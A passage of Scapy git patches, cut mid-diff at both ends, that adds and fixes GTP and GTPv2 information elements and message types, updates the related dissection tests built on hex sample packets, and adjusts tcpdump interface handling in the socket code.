b/test/contrib/gtp.uts index 4240a8753c1..dc2612f45a6 100644 --- a/test/contrib/gtp.uts +++ b/test/contrib/gtp.uts @@ -244,15 +244,25 @@ ie = IE_ProtocolConfigurationOptions( length=29, Protocol_Configuration=b'\x80\xc0#\x06\x01\x01\x00\x06\x00\x00\x80!\x10\x01\x01\x00\x10\x81\x06\x00\x00\x00\x00\x83\x06\x00\x00\x00\x00') ie.ietype == 132 and ie.Protocol_Configuration == b'\x80\xc0#\x06\x01\x01\x00\x06\x00\x00\x80!\x10\x01\x01\x00\x10\x81\x06\x00\x00\x00\x00\x83\x06\x00\x00\x00\x00' -= IE_GSNAddress(), dissect += IE_GSNAddress(), dissect IPv4 h = "3333333333332222222222228100838408004588005400000000fd1182850a2a00010a2a0002084b084b00406b463213003031146413c18000000180109181ba027fcf701a8c8500040a2a00018500040a2a000187000f0213921f7396d1fe7482ffff004a00f7a71e0a" gtp = Ether(hex_bytes(h)) ie = gtp.IE_list[3] -ie.ietype == 133 and ie.address == '10.42.0.1' +ie.ietype == 133 and ie.ipv4_address == '10.42.0.1' -= IE_GSNAddress(), basic instantiation -ie = IE_GSNAddress(address='10.42.0.1') -ie.ietype == 133 and ie.address == '10.42.0.1' += IE_GSNAddress(), dissect IPv6 +h = "33333333333322222222222286dd60000000002c1140fd010001000000000000000000000001fd01000100000000000000000000000208680868002ce2e9321a001c000000000000000010000004d2850010fd010001000000000000000000000001" +gtp = Ether(hex_bytes(h)) +ie = gtp.IE_list[1] +ie.ietype == 133 and ie.ipv6_address == 'fd01:1::1' + += IE_GSNAddress(), basic instantiation IPv4 +ie = IE_GSNAddress(ipv4_address='10.42.0.1') +ie.ietype == 133 and ie.ipv4_address == '10.42.0.1' + += IE_GSNAddress(), basic instantiation IPv6 +ie = IE_GSNAddress(ipv6_address='fd01:1::1') +ie.ietype == 133 and ie.ipv6_address == 'fd01:1::1' = IE_MSInternationalNumber(), dissect h = "333333333333222222222222810083840800458800c300000000fc1184e50a2a00010a2a00024a4d084b00af41993210009f79504a3e048e00000202081132547600000332f42004d27b0ffc10a692773d1158da9e2214051a0a00800002f1218300070661616161616184001d80c02306010100060000802110010100108106000000008306000000008500040a2a00018500040a2a00018600079111111111111187000d0213621f73967373741affff0094000120970001029800080032f42004d204d299000240009a0008111111111111000081182fb2" From d5d728dd83d86d6a196bf07186cf484d33304057 Mon Sep 17 00:00:00 2001 From: Miklos Tirpak Date: Fri, 28 Feb 2020 17:12:12 +0100 Subject: [PATCH 0010/1632] GTP: calculate the length of the GSN Address IE --- scapy/contrib/gtp.py | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 16b375741d6..4193efff453 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -536,6 +536,12 @@ class IE_GSNAddress(IE_Base): ConditionalField(IP6Field("ipv6_address", '::1'), lambda pkt: pkt.length == 16)] + def post_build(self, p, pay): + if self.length == 4: + tmp_len = len(p) - 3 + p = p[:1] + struct.pack("!H", tmp_len) + p[3:] + return p + class IE_MSInternationalNumber(IE_Base): name = "MS International Number" From 2657b2ff2630df5823d77227da97fcd2a862342d Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Fri, 28 Feb 2020 13:58:46 -0500 Subject: [PATCH 0011/1632] Update gtp_v2.py --- scapy/contrib/gtp_v2.py | 41 ++++++++++++++++++++++++++++++++++++++++- 1 file changed, 40 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index fa7e248de64..a6429aab626 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -207,11 +207,13 @@ 80: "Bearer QoS", 82: "RAT", 83: "Serving Network", + 84: "Bearer TFT", 86: "ULI", 87: "F-TEID", 93: "Bearer Context", 94: "Charging ID", 95: "Charging Characteristics", + 97: "Bearer Flags", 99: "PDN Type", 114: "UE Time zone", 126: "Port Number", @@ -219,6 +221,7 @@ 128: "Selection Mode", 145: "UCI", 161: "Max MBR/APN-AMBR (MMBR)", + 202: "UP Function Selection Indication Flags", 255: "Private Extension", } @@ -507,6 +510,19 @@ class IE_BearerContext(gtp.IE_Base): length_from=lambda pkt: pkt.length)] +class IE_BearerFlags(gtp.IE_Base): + name = "IE Bearer Flags" + fields_desc = [ByteEnumField("ietype", 97, IEType), + ShortField("length", None), + BitField("CR_flag", 0, 4), + BitField("instance", 0, 4), + BitField("SPARE", 0, 4), + BitField("ASI", 0, 1), + BitField("Vind", 0, 1), + BitField("VB", 0, 1), + BitField("PPC", 0, 1)] + + class IE_NotImplementedTLV(gtp.IE_Base): name = "IE not implemented" fields_desc = [ByteEnumField("ietype", 0, IEType), @@ -658,6 +674,16 @@ class IE_APN(gtp.IE_Base): length_from=lambda x: x.length)] +class IE_BearerTFT(gtp.IE_Base): + name = "IE Bearer TFT" + fields_desc = [ByteEnumField("ietype", 84, IEType), + FieldLenField("length", None, length_of="Bearer TFT", + adjust=lambda pkt, x: x + 4, fmt="H"), + BitField("CR_flag", 0, 4), + BitField("instance", 0, 4), + StrLenField("Bearer TFT", "", length_from=lambda x: x.length)] + + class IE_AMBR(gtp.IE_Base): name = "IE AMBR" fields_desc = [ByteEnumField("ietype", 72, IEType), @@ -1156,7 +1182,7 @@ class IE_SelectionMode(gtp.IE_Base): class IE_MMBR(gtp.IE_Base): name = "IE Max MBR/APN-AMBR (MMBR)" - fields_desc = [ByteEnumField("ietype", 72, IEType), + fields_desc = [ByteEnumField("ietype", 161, IEType), ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -1164,6 +1190,16 @@ class IE_MMBR(gtp.IE_Base): IntField("downlink_rate", 0)] +class IE_UPF_SelInd_Flags(gtp.IE_Base): + name = "IE UP Function Selection Indication Flags" + fields_desc = [ByteEnumField("ietype", 202, IEType), + ShortField("length", 0), + BitField("CR_flag", 0, 4), + BitField("instance", 0, 4), + BitField("SPARE", 0, 7), + BitField("DCNR", 0, 1)] + + # 3GPP TS 29.274 v16.1.0 section 8.67. class IE_PrivateExtension(gtp.IE_Base): name = "Private Extension" @@ -1194,11 +1230,13 @@ def extract_padding(self, s): 80: IE_Bearer_QoS, 82: IE_RAT, 83: IE_ServingNetwork, + 84: IE_BearerTFT, 86: IE_ULI, 87: IE_FTEID, 93: IE_BearerContext, 94: IE_ChargingID, 95: IE_ChargingCharacteristics, + 97: IE_BearerFlags, 99: IE_PDN_type, 114: IE_UE_Timezone, 126: IE_Port_Number, @@ -1206,6 +1244,7 @@ def extract_padding(self, s): 128: IE_SelectionMode, 145: IE_UCI, 161: IE_MMBR, + 202: IE_UPF_SelInd_Flags, 255: IE_PrivateExtension} # From 99dc633278e0ca7e8cc5b69fe2e1ae9326574521 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Fri, 28 Feb 2020 14:01:52 -0500 Subject: [PATCH 0012/1632] Update gtp_v2.uts --- test/contrib/gtp_v2.uts | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index 83caf074228..1078a033605 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -228,6 +228,26 @@ ie.CSG_ID == 22 and ie.AccessMode == 0 and ie.LCSG == 1 and ie.CMI == 0 and ie.M ie = IE_UCI(ietype='UCI', length=8, CR_flag=0, instance=0, MCC=b'123', MNC=b'45', SPARE=0, CSG_ID=22, AccessMode=0, LCSG=1, CMI=0) ie.ietype == 145 and ie.CSG_ID == 22 and ie.AccessMode == 0 and ie.LCSG == 1 and ie.CMI == 0 and ie.MCC == b'123' and ie.MNC == b'45' += IE_BearerFlags, dissection +h = "0026f126c100000c29b131dd81004d040800450000d8a6010000401118680a2180350a212735084b138800c47f8248210011000023f2000001005d006200610001000a" +gtp = Ether(hex_bytes(h)) +ie = gtp.IE_list[0].IE_list[0] +ie.ASI == 1 and ie.Vind == 0 and ie.VB == 1 and ie.PPC == 0 + += IE_BearerFlags, basic instantiation +ie = IE_BearerFlags(ietype='Bearer Flags', length=1, CR_flag=0, instance=0, SPARE=0, ASI=1, Vind=0, VB=1, PPC=0) +ie.ietype == 97 and ie.ASI == 1 and ie.Vind == 0 and ie.VB == 1 and ie.PPC == 0 + += IE_UPF_SelInd_Flags, dissection +h = "000c29b131dd0026f126c10081000d04080045000112608940003f111ea60a2127350a2180351388084b00fe0ec44820000d0000000000000100ca00010000" +gtp = Ether(hex_bytes(h)) +ie = gtp.IE_list[0] +ie.DCNR == 0 + += IE_UPF_SelInd_Flags, basic instantiation +ie = IE_UPF_SelInd_Flags(ietype='UP Function Selection Indication Flags', length=1, CR_flag=0, instance=0, SPARE=0, DCNR=0) +ie.ietype == 202 and ie.DCNR == 0 + = IE_FTEID, dissection h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" gtp = Ether(hex_bytes(h)) From 00d3588fad02a5789ec87a1aa1c98d9bf0c49786 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Fri, 28 Feb 2020 14:36:39 -0500 Subject: [PATCH 0013/1632] Update gtp_v2.py --- scapy/contrib/gtp_v2.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index a6429aab626..c115461124f 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -515,7 +515,7 @@ class IE_BearerFlags(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 97, IEType), ShortField("length", None), BitField("CR_flag", 0, 4), - BitField("instance", 0, 4), + BitField("instance", 0, 4), BitField("SPARE", 0, 4), BitField("ASI", 0, 1), BitField("Vind", 0, 1), @@ -1195,7 +1195,7 @@ class IE_UPF_SelInd_Flags(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 202, IEType), ShortField("length", 0), BitField("CR_flag", 0, 4), - BitField("instance", 0, 4), + BitField("instance", 0, 4), BitField("SPARE", 0, 7), BitField("DCNR", 0, 1)] From 3c639b81fb37c2985c1dda89d03807c82b992124 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Fri, 28 Feb 2020 15:43:51 -0500 Subject: [PATCH 0014/1632] Update gtp_v2.py --- scapy/contrib/gtp_v2.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index c115461124f..a54baae1929 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -484,6 +484,7 @@ class IE_UCI(gtp.IE_Base): BitField("LCSG", 0, 1), BitField("CMI", 0, 1)] + class IE_FTEID(gtp.IE_Base): name = "IE F-TEID" fields_desc = [ByteEnumField("ietype", 87, IEType), @@ -681,7 +682,8 @@ class IE_BearerTFT(gtp.IE_Base): adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), - StrLenField("Bearer TFT", "", length_from=lambda x: x.length)] + StrLenField("Bearer TFT", "", + length_from=lambda x: x.length)] class IE_AMBR(gtp.IE_Base): From 0985a1fd0eb9de2458b26d583cc9ee337dbe36e6 Mon Sep 17 00:00:00 2001 From: Miklos Tirpak Date: Wed, 4 Mar 2020 08:23:44 +0100 Subject: [PATCH 0015/1632] GTP: added simple build/dissection tests post_build function is removed, the length has to be explicitly set for IPv6. --- scapy/contrib/gtp.py | 6 ------ test/contrib/gtp.uts | 14 +++++++++++++- 2 files changed, 13 insertions(+), 7 deletions(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 4193efff453..16b375741d6 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -536,12 +536,6 @@ class IE_GSNAddress(IE_Base): ConditionalField(IP6Field("ipv6_address", '::1'), lambda pkt: pkt.length == 16)] - def post_build(self, p, pay): - if self.length == 4: - tmp_len = len(p) - 3 - p = p[:1] + struct.pack("!H", tmp_len) + p[3:] - return p - class IE_MSInternationalNumber(IE_Base): name = "MS International Number" diff --git a/test/contrib/gtp.uts b/test/contrib/gtp.uts index dc2612f45a6..71348fb28e6 100644 --- a/test/contrib/gtp.uts +++ b/test/contrib/gtp.uts @@ -244,6 +244,18 @@ ie = IE_ProtocolConfigurationOptions( length=29, Protocol_Configuration=b'\x80\xc0#\x06\x01\x01\x00\x06\x00\x00\x80!\x10\x01\x01\x00\x10\x81\x06\x00\x00\x00\x00\x83\x06\x00\x00\x00\x00') ie.ietype == 132 and ie.Protocol_Configuration == b'\x80\xc0#\x06\x01\x01\x00\x06\x00\x00\x80!\x10\x01\x01\x00\x10\x81\x06\x00\x00\x00\x00\x83\x06\x00\x00\x00\x00' += IE_GSNAddress(), simple build/dissect IPv4 +r = raw(IE_GSNAddress(ipv4_address='10.42.0.1')) +assert r == b'\x85\x00\x04\x0a\x2a\x00\x01' +ie = IE_GSNAddress(r) +ie.ietype == 133 and ie.ipv4_address == '10.42.0.1' + += IE_GSNAddress(), simple build/dissect IPv6 +r = raw(IE_GSNAddress(length=16, ipv6_address='fd01:1::1')) +assert r == b'\x85\x00\x10\xfd\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' +ie = IE_GSNAddress(r) +ie.ietype == 133 and ie.ipv6_address == 'fd01:1::1' + = IE_GSNAddress(), dissect IPv4 h = "3333333333332222222222228100838408004588005400000000fd1182850a2a00010a2a0002084b084b00406b463213003031146413c18000000180109181ba027fcf701a8c8500040a2a00018500040a2a000187000f0213921f7396d1fe7482ffff004a00f7a71e0a" gtp = Ether(hex_bytes(h)) @@ -261,7 +273,7 @@ ie = IE_GSNAddress(ipv4_address='10.42.0.1') ie.ietype == 133 and ie.ipv4_address == '10.42.0.1' = IE_GSNAddress(), basic instantiation IPv6 -ie = IE_GSNAddress(ipv6_address='fd01:1::1') +ie = IE_GSNAddress(length=16, ipv6_address='fd01:1::1') ie.ietype == 133 and ie.ipv6_address == 'fd01:1::1' = IE_MSInternationalNumber(), dissect From b184b98493ccb40e8685da95c65f8a8965ae3c0f Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Wed, 4 Mar 2020 20:14:37 -0500 Subject: [PATCH 0016/1632] Add new Gtpv2 messages --- scapy/contrib/gtp_v2.py | 36 +++++++++++++++++++++++++++++++++--- 1 file changed, 33 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index a54baae1929..d9cd294c49a 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -1287,8 +1287,24 @@ class GTPV2ModifyBearerCommand(GTPV2Command): name = "GTPv2 Modify Bearer Command" -class GTPV2ModifyBearerFailureNotification(GTPV2Command): - name = "GTPv2 Modify Bearer Command" +class GTPV2ModifyBearerFailureIndication(GTPV2Command): + name = "GTPv2 Modify Bearer Failure Indication" + + +class GTPV2DeleteBearerCommand(GTPV2Command): + name = "GTPv2 Delete Bearer Command" + + +class GTPV2DeleteBearerFailureIndication(GTPV2Command): + name = "GTPv2 Delete Bearer Failure Indication" + + +class GTPV2BearerResourceCommand(GTPV2Command): + name = "GTPv2 Bearer Resource Command" + + +class GTPV2BearerResourceFailureIndication(GTPV2Command): + name = "GTPv2 Bearer Resource Failure Indication" class GTPV2DownlinkDataNotifFailureIndication(GTPV2Command): @@ -1303,6 +1319,14 @@ class GTPV2ModifyBearerResponse(GTPV2Command): name = "GTPv2 Modify Bearer Response" +class GTPV2CreateBearerRequest(GTPV2Command): + name = "GTPv2 Create Bearer Request" + + +class GTPV2CreateBearerResponse(GTPV2Command): + name = "GTPv2 Create Bearer Response" + + class GTPV2UpdateBearerRequest(GTPV2Command): name = "GTPv2 Update Bearer Request" @@ -1376,8 +1400,14 @@ class GTPV2DownlinkDataNotifAck(GTPV2Command): bind_layers(GTPHeader, GTPV2DeleteSessionRequest, gtp_type=36) bind_layers(GTPHeader, GTPV2DeleteSessionResponse, gtp_type=37) bind_layers(GTPHeader, GTPV2ModifyBearerCommand, gtp_type=64) -bind_layers(GTPHeader, GTPV2ModifyBearerFailureNotification, gtp_type=65) +bind_layers(GTPHeader, GTPV2ModifyBearerFailureIndication, gtp_type=65) +bind_layers(GTPHeader, GTPV2DeleteBearerCommand, gtp_type=66) +bind_layers(GTPHeader, GTPV2DeleteBearerFailureIndication, gtp_type=67) +bind_layers(GTPHeader, GTPV2BearerResourceCommand, gtp_type=68) +bind_layers(GTPHeader, GTPV2BearerResourceFailureIndication, gtp_type=69) bind_layers(GTPHeader, GTPV2DownlinkDataNotifFailureIndication, gtp_type=70) +bind_layers(GTPHeader, GTPV2CreateBearerRequest, gtp_type=95) +bind_layers(GTPHeader, GTPV2CreateBearerResponse, gtp_type=96) bind_layers(GTPHeader, GTPV2UpdateBearerRequest, gtp_type=97) bind_layers(GTPHeader, GTPV2UpdateBearerResponse, gtp_type=98) bind_layers(GTPHeader, GTPV2DeleteBearerRequest, gtp_type=99) From e3399ec11d9c09a4abbaa79641a2b3c564c1e878 Mon Sep 17 00:00:00 2001 From: Miklos Tirpak Date: Mon, 9 Mar 2020 09:28:17 +0100 Subject: [PATCH 0017/1632] GTP: IE_GSNAddress length is None by default --- scapy/contrib/gtp.py | 12 +++++++++--- test/contrib/gtp.uts | 4 ++-- 2 files changed, 11 insertions(+), 5 deletions(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 16b375741d6..4bb20b0827c 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -530,12 +530,18 @@ class IE_ProtocolConfigurationOptions(IE_Base): class IE_GSNAddress(IE_Base): name = "GSN Address" fields_desc = [ByteEnumField("ietype", 133, IEType), - ShortField("length", 4), + ShortField("length", None), ConditionalField(IPField("ipv4_address", RandIP()), lambda pkt: pkt.length == 4), ConditionalField(IP6Field("ipv6_address", '::1'), lambda pkt: pkt.length == 16)] + def post_build(self, p, pay): + if self.length is None: + tmp_len = len(p) - 3 + p = p[:2] + struct.pack("!B", tmp_len) + p[3:] + return p + class IE_MSInternationalNumber(IE_Base): name = "MS International Number" @@ -858,8 +864,8 @@ def answers(self, other): class GTPCreatePDPContextRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Create PDP Context Request" - fields_desc = [PacketListField("IE_list", [IE_TEIDI(), IE_NSAPI(), IE_GSNAddress(), # noqa: E501 - IE_GSNAddress(), + fields_desc = [PacketListField("IE_list", [IE_TEIDI(), IE_NSAPI(), IE_GSNAddress(length=4, ipv4_address=RandIP()), # noqa: E501 + IE_GSNAddress(length=4, ipv4_address=RandIP()), IE_NotImplementedTLV(ietype=135, length=15, data=RandString(15))], # noqa: E501 IE_Dispatcher)] diff --git a/test/contrib/gtp.uts b/test/contrib/gtp.uts index 71348fb28e6..02204d14760 100644 --- a/test/contrib/gtp.uts +++ b/test/contrib/gtp.uts @@ -245,7 +245,7 @@ ie = IE_ProtocolConfigurationOptions( ie.ietype == 132 and ie.Protocol_Configuration == b'\x80\xc0#\x06\x01\x01\x00\x06\x00\x00\x80!\x10\x01\x01\x00\x10\x81\x06\x00\x00\x00\x00\x83\x06\x00\x00\x00\x00' = IE_GSNAddress(), simple build/dissect IPv4 -r = raw(IE_GSNAddress(ipv4_address='10.42.0.1')) +r = raw(IE_GSNAddress(length=4, ipv4_address='10.42.0.1')) assert r == b'\x85\x00\x04\x0a\x2a\x00\x01' ie = IE_GSNAddress(r) ie.ietype == 133 and ie.ipv4_address == '10.42.0.1' @@ -269,7 +269,7 @@ ie = gtp.IE_list[1] ie.ietype == 133 and ie.ipv6_address == 'fd01:1::1' = IE_GSNAddress(), basic instantiation IPv4 -ie = IE_GSNAddress(ipv4_address='10.42.0.1') +ie = IE_GSNAddress(length=4, ipv4_address='10.42.0.1') ie.ietype == 133 and ie.ipv4_address == '10.42.0.1' = IE_GSNAddress(), basic instantiation IPv6 From 2cc7852c7ecac5137dc30bb8518e9cc61a4d09d1 Mon Sep 17 00:00:00 2001 From: Miklos Tirpak Date: Mon, 9 Mar 2020 10:23:01 +0100 Subject: [PATCH 0018/1632] GTP: ignore E501 error of the folded line --- scapy/contrib/gtp.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 4bb20b0827c..4a36ae5dc07 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -865,7 +865,7 @@ class GTPCreatePDPContextRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Create PDP Context Request" fields_desc = [PacketListField("IE_list", [IE_TEIDI(), IE_NSAPI(), IE_GSNAddress(length=4, ipv4_address=RandIP()), # noqa: E501 - IE_GSNAddress(length=4, ipv4_address=RandIP()), + IE_GSNAddress(length=4, ipv4_address=RandIP()), # noqa: E501 IE_NotImplementedTLV(ietype=135, length=15, data=RandString(15))], # noqa: E501 IE_Dispatcher)] From d66d7ed59a7aba671fa7689945e9708ab1cabf70 Mon Sep 17 00:00:00 2001 From: Miklos Tirpak Date: Mon, 9 Mar 2020 10:59:29 +0100 Subject: [PATCH 0019/1632] GTP: fixed E261 error with missing space --- scapy/contrib/gtp.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 4a36ae5dc07..7de78567074 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -865,7 +865,7 @@ class GTPCreatePDPContextRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Create PDP Context Request" fields_desc = [PacketListField("IE_list", [IE_TEIDI(), IE_NSAPI(), IE_GSNAddress(length=4, ipv4_address=RandIP()), # noqa: E501 - IE_GSNAddress(length=4, ipv4_address=RandIP()), # noqa: E501 + IE_GSNAddress(length=4, ipv4_address=RandIP()), # noqa: E501 IE_NotImplementedTLV(ietype=135, length=15, data=RandString(15))], # noqa: E501 IE_Dispatcher)] From dd4748507088bc0153250b1bc19af6fa97926f24 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 14 Mar 2020 15:37:00 +0100 Subject: [PATCH 0020/1632] Fix L2ListenTcpdump --- scapy/supersocket.py | 27 +++++++++++++++++---------- 1 file changed, 17 insertions(+), 10 deletions(-) diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 5906315c2d0..aa9e6003828 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -221,8 +221,9 @@ def __init__(self, type=ETH_P_IP, filter=None, iface=None, promisc=None, nofilte self.outs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 self.outs.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1) self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 + self.iface = iface if iface is not None: - self.ins.bind((iface, type)) + self.ins.bind((self.iface, type)) if not six.PY2: try: # Receive Auxiliary Data (VLAN tags) @@ -359,16 +360,16 @@ def __init__(self, iface=None, promisc=None, filter=None, nofilter=False, prog=None, *arg, **karg): self.outs = None args = ['-w', '-', '-s', '65535'] + if iface is None and (WINDOWS or DARWIN): + iface = conf.iface + if WINDOWS: + try: + iface = iface.pcap_name + except AttributeError: + pass + self.iface = iface if iface is not None: - if WINDOWS: - try: - args.extend(['-i', iface.pcap_name]) - except AttributeError: - args.extend(['-i', iface]) - else: - args.extend(['-i', iface]) - elif WINDOWS or DARWIN: - args.extend(['-i', conf.iface.pcap_name if WINDOWS else conf.iface]) # noqa: E501 + args.extend(['-i', self.iface]) if not promisc: args.append('-p') if not nofilter: @@ -389,6 +390,12 @@ def close(self): SuperSocket.close(self) self.tcpdump_proc.kill() + @staticmethod + def select(sockets, remain=None): + if (WINDOWS or DARWIN): + return sockets, None + return SuperSocket.select(sockets, remain=remain) + class TunTapInterface(SuperSocket): """A socket to act as the host's peer of a tun / tap interface. From af861f5e50511cbd032e165f1767e2b775d4ee54 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Mon, 16 Mar 2020 16:20:07 -0400 Subject: [PATCH 0021/1632] Update gtp_v2.py --- scapy/contrib/gtp_v2.py | 86 +++++++++++++++++++++++++++-------------- 1 file changed, 57 insertions(+), 29 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index d9cd294c49a..96c626dbde1 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -263,7 +263,8 @@ def answers(self, other): class IE_IPv4(gtp.IE_Base): name = "IE IPv4" fields_desc = [ByteEnumField("ietype", 74, IEType), - ShortField("length", 0), + FieldLenField("length", None, length_of="IPv4", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), IPField("address", RandIP())] @@ -272,7 +273,8 @@ class IE_IPv4(gtp.IE_Base): class IE_MEI(gtp.IE_Base): name = "IE MEI" fields_desc = [ByteEnumField("ietype", 75, IEType), - ShortField("length", 0), + FieldLenField("length", None, length_of="MEI", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), LongField("MEI", 0)] @@ -295,7 +297,8 @@ def IE_Dispatcher(s): class IE_EPSBearerID(gtp.IE_Base): name = "IE EPS Bearer ID" fields_desc = [ByteEnumField("ietype", 73, IEType), - ShortField("length", 0), + FieldLenField("length", None, length_of="EPS Bearer ID", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteField("EBI", 0)] @@ -304,7 +307,8 @@ class IE_EPSBearerID(gtp.IE_Base): class IE_RAT(gtp.IE_Base): name = "IE RAT" fields_desc = [ByteEnumField("ietype", 82, IEType), - ShortField("length", 0), + FieldLenField("length", None, length_of="RAT", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteEnumField("RAT_type", None, RATType)] @@ -313,7 +317,8 @@ class IE_RAT(gtp.IE_Base): class IE_ServingNetwork(gtp.IE_Base): name = "IE Serving Network" fields_desc = [ByteEnumField("ietype", 83, IEType), - ShortField("length", 0), + FieldLenField("length", None, length_of="Serving Network", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("MCC", "", 2), @@ -395,7 +400,8 @@ class IE_ULI(gtp.IE_Base): name = "IE User Location Information" fields_desc = [ ByteEnumField("ietype", 86, IEType), - ShortField("length", 0), + FieldLenField("length", None, length_of="User Location Information", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 2), @@ -472,7 +478,8 @@ class IE_ULI(gtp.IE_Base): class IE_UCI(gtp.IE_Base): name = "IE UCI" fields_desc = [ByteEnumField("ietype", 145, IEType), - ShortField("length", 0), + FieldLenField("length", None, length_of="UCI", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("MCC", "", 2), @@ -488,7 +495,8 @@ class IE_UCI(gtp.IE_Base): class IE_FTEID(gtp.IE_Base): name = "IE F-TEID" fields_desc = [ByteEnumField("ietype", 87, IEType), - ShortField("length", 0), + FieldLenField("length", None, length_of="F-TEID", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("ipv4_present", 0, 1), @@ -504,7 +512,8 @@ class IE_FTEID(gtp.IE_Base): class IE_BearerContext(gtp.IE_Base): name = "IE Bearer Context" fields_desc = [ByteEnumField("ietype", 93, IEType), - ShortField("length", 0), + FieldLenField("length", None, length_of="Bearer Context", + adjust=lambda pkt, x: x, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), PacketListField("IE_list", None, IE_Dispatcher, @@ -514,7 +523,8 @@ class IE_BearerContext(gtp.IE_Base): class IE_BearerFlags(gtp.IE_Base): name = "IE Bearer Flags" fields_desc = [ByteEnumField("ietype", 97, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="Bearer Flags", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 4), @@ -536,7 +546,8 @@ class IE_NotImplementedTLV(gtp.IE_Base): class IE_IMSI(gtp.IE_Base): name = "IE IMSI" fields_desc = [ByteEnumField("ietype", 1, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="IMSI", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("IMSI", "33607080910", @@ -645,7 +656,8 @@ class IE_IMSI(gtp.IE_Base): class IE_Cause(gtp.IE_Base): name = "IE Cause" fields_desc = [ByteEnumField("ietype", 2, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="Cause", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteEnumField("Cause", 1, CAUSE_VALUES), @@ -658,7 +670,8 @@ class IE_Cause(gtp.IE_Base): class 